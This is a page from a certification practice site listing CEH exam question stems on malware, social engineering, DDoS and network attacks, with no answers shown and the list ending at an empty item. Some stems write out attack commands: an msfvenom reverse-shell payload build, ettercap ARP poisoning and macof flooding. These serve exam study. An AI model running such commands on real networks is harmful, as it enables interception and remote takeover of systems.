Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

CEH Malware, Social Engineering and Network Attacks — All Questions With Answers

Complete CEH Malware, Social Engineering and Network Attacks question bank — all 0 questions with answers and detailed explanations.

216 Questions. Free. No signup.
Question 1 (medium, multiple choice)

A security analyst notices a high volume of ICMP Echo Reply packets on the network. The source IPs are varied, but the destination IP is the same. Which type of attack is MOST likely occurring?

Question 2 (easy, multiple choice)

A user receives a phone call from someone claiming to be from IT support, asking for their password to troubleshoot an issue. Which social engineering technique is being used?

Question 3 (medium, multiple choice)

Which tool would a penetration tester MOST likely use to perform ARP poisoning and conduct a man-in-the-middle attack on a local network?

Question 4 (hard, multiple choice)

An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?

Question 5 (medium, multiple choice)

A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?

Question 6 (medium, multiple choice)

An organization is experiencing repeated DDoS attacks that consume all available bandwidth. Which mitigation technique is MOST effective for handling such volumetric attacks?

Question 7 (easy, multiple choice)

Which type of malware is characterized by self-replication and spreading across networks without needing a host file?

Question 8 (medium, multiple choice)

A penetration tester uses the Social Engineering Toolkit (SET) to create a malicious USB drive that autoruns when inserted. Which social engineering technique is being employed?

Question 9 (hard, multiple choice)

An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?

Question 10 (easy, multiple choice)

Which type of malware encrypts the victim's files and demands payment for the decryption key?

Question 11 (medium, multiple choice)

A network administrator notices that the switch's CAM table is full, causing the switch to flood all incoming traffic out of all ports. Which attack is MOST likely occurring?

Question 12 (hard, multiple choice)

During a penetration test, you capture the following output: 'HTTP/1.1 200 OK ... Set-Cookie: sessionid=abc123; path=/'. You then send a request with a modified cookie value 'sessionid=abc124' and receive a valid session. Which type of vulnerability has been exploited?

Question 13 (medium, multi select)

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

Question 14 (hard, multi select)

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

Question 15 (medium, multi select)

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Question 16 (medium, multiple choice)

A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?

Question 17 (easy, multiple choice)

Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?

Question 18 (hard, multiple choice)

A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?

Question 19 (medium, multiple choice)

An organization wants to test its employees' susceptibility to social engineering by sending fake emails that appear to come from the IT department, requesting password resets. Which tool would be MOST effective for conducting this test?

Question 20 (medium, multiple choice)

A security team observes that a switch's MAC address table is full, and the switch has started flooding unicast traffic to all ports. Which attack has MOST likely been performed?

Question 21 (easy, multiple choice)

Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?

Question 22 (medium, multiple choice)

An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?

Question 23 (hard, multiple choice)

A security analyst detects a file named 'invoice.pdf.exe' in an email attachment. When the file is submitted to VirusTotal, multiple engines detect it as a Trojan. The analyst wants to perform dynamic analysis to observe its behavior. Which approach is BEST?

Question 24 (easy, multiple choice)

Which type of social engineering attack involves a malicious actor impersonating a legitimate organization in a voicemail message to trick the victim into revealing sensitive information?

Question 25 (medium, multiple choice)

A penetration tester is performing a session hijacking attack. After capturing packets, the tester successfully predicts the TCP sequence numbers and injects packets to take over the session. Which type of attack is this?

Question 26 (hard, multiple choice)

A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?

Question 27 (medium, multiple choice)

An employee receives an email that appears to be from the CEO, requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ceo@cornpany.com instead of ceo@company.com). This is an example of which type of attack?

Question 28 (medium, multi select)

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Question 29 (hard, multi select)

Which THREE of the following are techniques used in static malware analysis? (Select 3)

Question 30 (medium, multi select)

Which TWO of the following are common indicators of a DNS spoofing attack? (Select 2)

Question 31 (medium, multiple choice)

A security analyst discovers a user downloaded a file that, when executed, creates a hidden process that connects to a remote server and allows full remote control of the system. Which type of malware BEST describes this behavior?

Question 32 (easy, multiple choice)

A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?

Question 33 (hard, multiple choice)

An organization's security team observes a surge in outgoing DNS queries to external servers from a single internal host, with each query returning unusually large responses (e.g., 4000 bytes). The host is not configured as a DNS resolver. Which attack is MOST likely occurring?

Question 34 (medium, multiple choice)

A security analyst is investigating a suspicious file and wants to quickly determine whether it is known malware without executing it. Which approach should the analyst use FIRST?

Question 35 (medium, multiple choice)

A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?

Question 36 (easy, multiple choice)

Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?

Question 37 (hard, multiple choice)

During a penetration test, you execute a command that sends a large number of spoofed ICMP echo request packets to a subnet's broadcast address. This results in a flood of replies to the target system. Which attack have you performed?

Question 38 (medium, multiple choice)

A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?

Question 39 (medium, multiple choice)

A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?

Question 40 (easy, multiple choice)

Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?

Question 41 (hard, multiple choice)

A penetration tester uses the following command to scan a target: nmap -sU -sV -p 53,161,162 10.0.0.1. Which of the following BEST describes what this scan will accomplish?

Question 42 (medium, multiple choice)

An attacker calls a company's help desk, pretending to be a new employee who forgot his username and password. The attacker provides some employee details gleaned from social media and convinces the help desk to reset the password. Which social engineering technique is being used?

Question 43 (medium, multi select)

Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)

Question 44 (hard, multi select)

Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)

Question 45 (medium, multi select)

Which TWO of the following are examples of static malware analysis techniques? (Select two.)

Question 46 (easy, multiple choice)

A security analyst notices repeated failed login attempts from a single external IP address targeting the company's webmail portal. The attempts use common usernames like 'admin', 'user', and 'test'. Which type of social engineering attack is MOST likely being attempted?

Question 47 (medium, multiple choice)

During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?

Question 48 (hard, multiple choice)

An incident response team discovers a suspicious executable on a compromised workstation. They want to analyze the malware without executing it. Which of the following techniques would be MOST appropriate for this initial analysis?

Question 49 (medium, multiple choice)

A security analyst observes a sudden surge in incoming UDP traffic to the company's DNS servers from multiple external IP addresses. The packets appear to be DNS queries with spoofed source IPs. Which type of DDoS attack is MOST likely occurring?

Question 50 (easy, multiple choice)

Which of the following is a type of malware that spreads by replicating itself across a network without requiring a host file?

Question 51 (medium, multiple choice)

A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?

Question 52 (medium, multiple choice)

An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?

Question 53 (hard, multiple choice)

A security analyst is analyzing a suspicious file and runs the command 'strings malware.exe | grep -i http'. The output shows several URLs ending with '.exe'. What does this indicate?

Question 54 (medium, multiple choice)

Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?

Question 55 (easy, multiple choice)

A user reports that their computer is infected with ransomware. Which of the following is the BEST immediate action for the security team to take?

Question 56 (medium, multiple choice)

Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?

Question 57 (hard, multiple choice)

A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?

Question 58 (medium, multi select)

Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)

Question 59 (hard, multi select)

Which THREE of the following are examples of application-layer DDoS attacks? (Select 3)

Question 60 (medium, multi select)

Which TWO of the following are valid techniques for session hijacking? (Select 2)

Question 61 (easy, multiple choice)

A security analyst discovers a file named invoice.exe in an email attachment. Static analysis with PEiD indicates the file is packed with UPX. What is the BEST next step in analyzing this malware?

Question 62 (medium, multiple choice)

A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?

Question 63 (hard, multiple choice)

During a penetration test, an analyst uses a tool that sends forged ARP replies to associate the attacker's MAC address with the IP address of the default gateway. This technique allows the attacker to intercept traffic. Which tool is commonly used for this purpose?

Question 64 (medium, multiple choice)

A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?

Question 65 (medium, multiple choice)

A user receives a phone call from someone claiming to be from IT support, asking for their password to perform a system update. This is an example of which social engineering technique?

Question 66 (hard, multiple choice)

A forensic analyst examines a system infected with malware that displays ransomware notes and encrypts files. The analyst uses a sandbox to observe behavior. During analysis, the malware contacts a C2 server and downloads additional payloads. Which type of malware analysis is being performed?

Question 67 (easy, multiple choice)

Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?

Question 68 (medium, multiple choice)

An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?

Question 69 (hard, multiple choice)

A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?

Question 70 (easy, multiple choice)

Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?

Question 71 (medium, multiple choice)

A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack that floods the switch with fake MAC addresses. Which attack is this?

Question 72 (medium, multiple choice)

Which DoS attack exploits the HTTP protocol by sending partial HTTP requests to keep connections open, exhausting server resources?

Question 73 (medium, multi select)

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

Question 74 (hard, multi select)

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

Question 75 (easy, multi select)

Which TWO of the following are types of malware analysis? (Select 2)

Question 76 (easy, multiple choice)

A security analyst observes repeated failed login attempts from a single IP address targeting multiple user accounts. Which type of social engineering attack is being attempted?

Question 77 (medium, multiple choice)

A security analyst runs the command 'tcpdump -i eth0 -n host 10.0.0.5 and port 80' and sees many packets with the SYN flag set but no corresponding ACK. Which attack is likely occurring?

Question 78 (medium, multiple choice)

During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?

Question 79 (easy, multiple choice)

An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?

Question 80 (hard, multiple choice)

A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?

Question 81 (medium, multiple choice)

After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?

Question 82 (easy, multiple choice)

An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?

Question 83 (hard, multiple choice)

During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?

Question 84 (medium, multiple choice)

An analyst is analyzing a suspicious file using VirusTotal and observes that only 3 out of 60 antivirus engines detect it as malicious. The file has been submitted before but with no detections. What should the analyst conclude?

Question 85 (medium, multiple choice)

A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?

Question 86 (hard, multiple choice)

An attacker wants to perform a man-in-the-middle attack on a local network. Which two tools from the following list would be most effective? (Select the best answer from the options below; note: this is a multiple choice, not multi-select) A) Wireshark B) Ettercap C) Nmap D) Metasploit E) Aircrack-ng

Question 87 (easy, multiple choice)

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Question 88 (medium, multi select)

Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)

Question 89 (hard, multi select)

Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)

Question 90 (medium, multi select)

Which TWO of the following are examples of social engineering attacks? (Select two)

Question 91 (medium, multiple choice)

A security analyst notices an unusual spike in outbound traffic on UDP port 53 from a single internal host. The host is not a DNS server. Which type of malware is MOST likely responsible?

Question 92 (easy, multiple choice)

Which tool would an ethical hacker use to automatically generate a malicious USB drive that, when plugged in, executes a payload and connects back to the attacker?

Question 93 (medium, multiple choice)

During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?

Question 94 (hard, multiple choice)

A penetration tester wants to perform a stealth scan without completing the TCP three-way handshake. The target is a web server on port 80. The tester uses Nmap with the -sS flag. What is the expected behavior if the port is open?

Question 95 (easy, multiple choice)

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Question 96 (medium, multiple choice)

A security analyst reviews logs and notices that an attacker crafted a packet with a source IP address matching the target's IP address, and sent it to a network's broadcast address. Which type of attack does this describe?

Question 97 (medium, multiple choice)

Which of the following is a characteristic of a polymorphic virus?

Question 98 (hard, multiple choice)

An organization experiences a DDoS attack where the attacker sends many incomplete HTTP requests that keep connections open, exhausting the server's connection pool. Which attack technique is being used?

Question 99 (medium, multiple choice)

During a social engineering engagement, an attacker calls an employee pretending to be from IT support and asks for their password to perform a system update. Which social engineering technique is being employed?

Question 100 (easy, multiple choice)

Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?

Question 101 (medium, multiple choice)

A company wants to defend against DNS amplification attacks. Which mitigation technique would be MOST effective?

Question 102 (hard, multiple choice)

An ethical hacker is analyzing a suspicious file using static analysis. Which of the following actions is part of static malware analysis?

Question 103 (medium, multi select)

Which TWO of the following are examples of application-layer DDoS attacks? (Choose two.)

Question 104 (hard, multi select)

Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)

Question 105 (medium, multi select)

Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)

Question 106 (medium, multiple choice)

A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?

Question 107 (easy, multiple choice)

Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?

Question 108 (medium, multiple choice)

An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?

Question 109 (hard, multiple choice)

A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?

Question 110 (medium, multiple choice)

Which tool can be used to perform ARP poisoning to intercept traffic between a victim and the default gateway?

Question 111 (easy, multiple choice)

A user reports that their system has become very slow and numerous pop-up ads appear even when browsing is not active. Which type of malware is MOST likely installed?

Question 112 (hard, multiple choice)

An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?

Question 113 (medium, multiple choice)

Which of the following is a form of social engineering where an attacker physically follows an authorized person into a restricted area without proper authentication?

Question 114 (medium, multiple choice)

An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?

Question 115 (hard, multiple choice)

A penetration tester runs the following command: `macof -i eth0 -s 192.168.1.100 -d 10.0.0.1`. Which attack is being performed?

Question 116 (easy, multiple choice)

Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?

Question 117 (medium, multiple choice)

An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?

Question 118 (medium, multi select)

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Question 119 (hard, multi select)

Which THREE of the following are static malware analysis techniques? (Select 3)

Question 120 (easy, multi select)

Which TWO of the following are examples of session hijacking attacks? (Select 2)

Question 121 (easy, multiple choice)

A security analyst receives an email that appears to be from the CEO, urgently requesting a wire transfer. The email address is slightly misspelled (ceo@cornpany.com instead of ceo@company.com). Which type of social engineering attack is this?

Question 122 (medium, multiple choice)

During a penetration test, a tester uses a tool to perform ARP spoofing to intercept traffic between two hosts on the same subnet. Which tool is most commonly associated with this technique?

Question 123 (hard, multiple choice)

A security analyst runs the following command: 'python macof -i eth0 -n 1000'. Shortly after, the switch begins flooding traffic to all ports. What is the analyst trying to achieve?

Question 124 (medium, multiple choice)

A user reports that their system has become sluggish and they see pop-up advertisements even when no browser is open. Additionally, unknown processes are running in Task Manager. Which type of malware is most likely responsible?

Question 125 (medium, multiple choice)

A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?

Question 126 (hard, multiple choice)

After a security incident, an analyst retrieves a suspicious file. To determine if it is malicious without executing it, the analyst runs the 'strings' command and uploads the file to VirusTotal. Which type of malware analysis is being performed?

Question 127 (medium, multiple choice)

A penetration tester successfully predicts the TCP sequence numbers of a target and sends crafted packets to impersonate a trusted host. Which type of attack is this?

Question 128 (easy, multiple choice)

Which of the following is a type of malware that replicates itself by attaching to executable files and requires human action to spread, such as opening an infected attachment?

Question 129 (medium, multiple choice)

A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?

Question 130 (hard, multiple choice)

An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?

Question 131 (medium, multiple choice)

Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?

Question 132 (easy, multiple choice)

A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?

Question 133 (medium, multi select)

Which TWO of the following are characteristics of a polymorphic virus?

Question 134 (hard, multi select)

Which THREE of the following are effective DDoS mitigation techniques?

Question 135 (medium, multi select)

Which TWO of the following are examples of application-layer DDoS attacks?

Question 136 (easy, multiple choice)

A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?

Question 137 (medium, multiple choice)

During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?

Question 138 (medium, multiple choice)

A security analyst runs 'strings malware.exe' and finds several URLs and IP addresses. The analyst then uploads the file to VirusTotal and gets a detection ratio of 5/70. What type of analysis has been performed?

Question 139 (hard, multiple choice)

An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?

Question 140 (easy, multiple choice)

Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?

Question 141 (medium, multiple choice)

A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?

Question 142 (hard, multiple choice)

A security analyst captures network traffic and sees a sequence of ARP replies with the same IP address mapping to different MAC addresses within a short period. Which attack is indicated?

Question 143 (easy, multiple choice)

An attacker sends an email to the CEO of a company, pretending to be a board member and requesting a wire transfer for a confidential acquisition. Which social engineering attack is this?

Question 144 (medium, multiple choice)

A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?

Question 145 (medium, multiple choice)

Which of the following is the BEST defense against a TCP SYN flood attack?

Question 146 (hard, multiple choice)

A penetration tester uses a tool to spoof ARP replies, redirecting traffic through the tester's machine. The tester then captures credentials from the redirected traffic. Which tool is BEST suited for this task?

Question 147 (easy, multiple choice)

An employee receives an SMS message that claims to be from the IT department, asking the employee to click a link to verify their email account. Which social engineering attack is this?

Question 148 (medium, multi select)

Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)

Question 149 (medium, multi select)

Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)

Question 150 (hard, multi select)

Which THREE of the following are effective techniques to prevent ARP poisoning attacks? (Choose three.)

Question 151 (medium, multiple choice)

A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?

Question 152 (easy, multiple choice)

Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?

Question 153 (hard, multiple choice)

An attacker uses the Social Engineering Toolkit (SET) to craft a phishing email that appears to come from the company's CEO, requesting the recipient to urgently wire funds to a new vendor. This attack is BEST described as which type of social engineering?

Question 154 (medium, multiple choice)

During a penetration test, a tester captures network traffic and notices a large number of ARP replies claiming that 192.168.1.1 is at MAC address 00:11:22:33:44:55, which is different from the legitimate gateway MAC. Which attack is likely in progress?

Question 155 (easy, multiple choice)

A security administrator notices that the network switch is broadcasting traffic to all ports as if it were a hub. The switch logs show a sudden flood of packets with random MAC addresses. Which attack is MOST likely occurring?

Question 156 (medium, multiple choice)

A malware analyst wants to examine a suspicious executable without executing it. The goal is to extract strings, view the PE header, and check for known signatures. Which approach is the analyst using?

Question 157 (medium, multiple choice)

An organization experiences a DDoS attack where the attacker sends a flood of UDP packets to a server, causing it to become unresponsive. The packets appear to come from many different source IP addresses and are directed to random high-numbered ports. Which type of DDoS attack is this?

Question 158 (hard, multiple choice)

A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?

Question 159 (easy, multiple choice)

Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?

Question 160 (medium, multiple choice)

A penetration tester uses a tool to perform a man-in-the-middle attack by sending forged DNS responses that redirect users to a malicious website. Which tool is MOST likely being used to perform DNS spoofing?

Question 161 (hard, multiple choice)

During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?

Question 162 (medium, multiple choice)

An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?

Question 163 (medium, multi select)

Which TWO of the following are characteristics of a SYN flood attack? (Select 2)

Question 164 (hard, multi select)

Which THREE of the following are common methods used to mitigate DDoS attacks? (Select 3)

Question 165 (medium, multi select)

Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)

Question 166 (easy, multiple choice)

A security analyst receives an email from what appears to be the company's CEO requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ce0@company.com instead of ceo@company.com). Which type of social engineering attack is this?

Question 167 (medium, multiple choice)

A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?

Question 168 (medium, multiple choice)

A penetration tester needs to perform ARP poisoning to intercept traffic between two hosts on the same subnet. Which tool would be the most appropriate choice for this task?

Question 169 (hard, multiple choice)

During a ransomware incident response, a forensic analyst recovers a suspicious file that appears to be a PE executable. The analyst wants to quickly check if the file is known malware without executing it. Which of the following is the BEST first step?

Question 170 (easy, multiple choice)

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Question 171 (medium, multiple choice)

A security team wants to mitigate a DNS amplification DDoS attack. Which of the following techniques would be MOST effective in preventing the attack from leveraging open DNS resolvers?

Question 172 (medium, multiple choice)

During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?

Question 173 (hard, multiple choice)

A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?

Question 174 (easy, multiple choice)

Which of the following is a characteristic of a polymorphic virus?

Question 175 (medium, multiple choice)

An attacker uses the Social Engineering Toolkit (SET) to send a malicious email to employees of a company, claiming to be from IT support and urging them to click a link to reset their password. Which social engineering attack is being performed?

Question 176 (hard, multiple choice)

An analyst runs the following command: `tcpdump -i eth0 src host 192.168.1.10 and dst port 80 -w http_traffic.pcap`. What is the primary purpose of this command?

Question 177 (medium, multiple choice)

A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?

Question 178 (medium, multi select)

Which TWO of the following are examples of application layer DDoS attacks? (Select two.)

Question 179 (hard, multi select)

Which THREE of the following are techniques used in session hijacking? (Select three.)

Question 180 (easy, multi select)

Which TWO of the following are types of malware analysis? (Select two.)

Question 181 (medium, multiple choice)

A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?

Question 182 (easy, multiple choice)

Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?

Question 183 (hard, multiple choice)

During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?

Question 184 (medium, multiple choice)

A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?

Question 185 (easy, multiple choice)

Which malware type is characterized by self-replication across networks without needing a host file?

Question 186 (medium, multiple choice)

An attacker gains physical access to a restricted area by following an authorized employee through a secured door without swiping a badge. This technique is known as:

Question 187 (hard, multiple choice)

A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?

Question 188 (medium, multiple choice)

Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?

Question 189 (medium, multiple choice)

A user receives a text message claiming their bank account is locked and requiring them to click a link to verify. This social engineering method is called:

Question 190 (easy, multiple choice)

Which malware analysis approach involves running the suspicious file in a controlled environment to observe its behavior?

Question 191 (hard, multiple choice)

A penetration tester uses a tool to perform a MAC flooding attack. What is the intended result of this attack?

Question 192 (medium, multiple choice)

Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?

Question 193 (medium, multi select)

Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)

Question 194 (hard, multi select)

Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)

Question 195 (medium, multi select)

Which TWO of the following are techniques used in session hijacking? (Choose 2)

Question 196 (medium, multiple choice)

A security analyst notices repeated TCP SYN packets sent to a server without corresponding SYN-ACK replies. The source IP addresses are spoofed and appear to be random. Which type of attack is MOST likely occurring?

Question 197 (easy, multiple choice)

A user receives an email claiming to be from their bank, asking them to click a link and verify their account credentials. The email contains spelling errors and the link points to a suspicious domain. What type of social engineering attack is this?

Question 198 (hard, multiple choice)

During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?

Question 199 (medium, multiple choice)

An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?

Question 200 (easy, multiple choice)

A security analyst receives an alert indicating that a workstation is sending outbound connections to a known malicious IP address. The analyst suspects a Trojan. Which tool is BEST for performing dynamic analysis of the suspicious binary?

Question 201 (hard, multiple choice)

An attacker intercepts a TCP session between a client and a server. By analyzing sequence numbers, the attacker successfully predicts the next sequence number and injects malicious packets. Which attack is being performed?

Question 202 (medium, multi select)

Which TWO of the following are characteristics of a polymorphic virus?

Question 203 (medium, multi select)

Which TWO tools are commonly used for ARP poisoning attacks?

Question 204 (hard, multi select)

Which THREE of the following are indicators of a slowloris DDoS attack?

Question 205 (easy, multi select)

Which TWO of the following are types of malware that specifically aim to demand payment from victims?

Question 206 (medium, multi select)

Which TWO of the following are examples of amplification attacks used in DDoS?

Question 207 (hard, multi select)

Which THREE of the following are techniques used in session hijacking?

Question 208 (easy, multi select)

Which TWO of the following are types of social engineering attacks that rely on impersonation?

Question 209 (medium, multi select)

Which THREE of the following are valid methods for DDoS mitigation?

Question 210 (hard, multi select)

Which TWO of the following are features of a Remote Access Trojan (RAT)?

Question 211 (medium, multiple choice)

